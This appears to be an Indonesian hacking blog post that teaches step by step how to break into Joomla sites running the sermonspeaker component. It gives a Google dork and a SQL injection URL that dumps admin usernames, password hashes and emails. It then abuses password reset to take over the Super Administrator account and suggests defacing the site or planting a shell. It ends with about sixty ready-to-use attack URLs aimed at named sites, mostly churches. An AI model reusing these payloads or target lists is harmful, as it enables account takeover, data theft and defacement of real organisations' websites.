Step by step Exploit Joomla | Uphik Lamers

Friday, November 11, 2011

Step by step Exploit Joomla

 
Oke langsung ke pembahasan aja yah

==================================

Code:
* Dork : inurl:option=com_sermonspeaker

Code:
* Exploit : /index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
===================================

1. Pertama cari dulu target di google.
Dork : inurl:option=com_sermonspeaker

2. Jika sudah ketemu tergetnya silahkan mencoba memasang exploit. Kali ini target kita adalah http://loichung.com
[Image: 1.jpg]

3. Langsung pasang exploit nya
Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

[Image: 2-1.jpg]

4. Wah username, email, sama passwordnya keluar semua tuh. Buat yang mau encrypt password nya silahkan. Tapi kali ini kita akan menggunakan tekhnik lupa password.

Code:
/index.php?option=com_user&view=reset

Tinggal masukin email admin nya
[Image: 3.jpg]

5. Terus tekan submit dan akan muncul seperti ini
[Image: 4.jpg]

Wah minta activation code, harus gimana nih ?

Tenang aja monggo kita cari aktivasinya
Tambahkan ,0x3a,activation setelah 0x3a,email jadinya seperti ini

Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email,0x3a,activation)/**/from/**/jos_users/**/

Jika kita sudah menambahkan ,0x3a,activation setelah 0x3a,email maka akan muncul seperti ini

[Image: 5.jpg]

Wah activation code nya keluar tuh sekarang tinggal kita paste aja activation code nya

[Image: 6.jpg]

6. Sekarang tekan lagi submit maka akan muncul seperti ini
[Image: 7.jpg]

Nah sekarang silahkan masukkan password baru sesuai keinginan kita. Setelah itu tekan submit lagi

[Image: 8.jpg]

7. Sekarang kita login as admin melalui
Code:
http://[site]/[pacth]/administrator

[Image: 9.jpg]

Masukkan username admin dan password admin.

[Image: 10.jpg]

Dan sekarang kita sudah berhasil login sebagai Super Administrator dan kita berhak melakukan apapun di site tersebut. Untuk selanjutnya silahkan anda lanjutkan.

Entah site itu mau anda
* Deface Indexnya
* Tanam shell
* Dll

Buat teman-teman yang mengalami kesulitan mendapatkan target ini saya kasih target + exploit nya
Code:
http://www.rlwministry.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://gracebaptistabilene.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.beaconchurch.co.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://thehouseofprayeratbluewateroaks.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://newburghumc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.wellingtonpc.co.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://sermons.thesteeplechurch.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://cornerstonechurchedh.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.wgic.org/i/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.worldprayerministriesinc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://yourcbcfamily.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.midacts.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.gileadbaptist.net/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://wesleyssi.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.fbclansing.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.fbcenterprise.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://tsawwassenalliance.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://newfaithchurchinsacultexas.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.cabotumc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.centerpointnh.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.monfmc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.kruger.org.au/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.firstlyman.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://hccpromiseland.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.fmchurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.baysidebaptist.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://rockfordreformedchurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://nettleschurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://pbsda.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://mycalvarybc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://columbusbiblechurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://victorybyfaith.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.cardiffcitychurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.nmccenter.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.rlwministry.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://simplemethods.org/deberrybaptistchurch/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.firstfree.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.stjohns-port.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.gladtidings.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.immanuelchurch.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.nlcm.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.redeemerjamison.org/joomla/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.columbusbiblechurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.wotfc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://mycalvarybc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://trpc.org.au/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://gtaustin.net/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.communityofhopechurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.cicfamily.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.redruthbaptist.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://southgrandvillechurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.wotfc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://iepvitarte.org/demo/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://ijsselmuiden.gkv.nl/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://adventistasberriensprings.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.fcbrackenfell.co.za/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.acude.cc/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://loichung.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.elim.fo/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.cariciasparaelalma.org/cr/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.kcccph.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
Post a Comment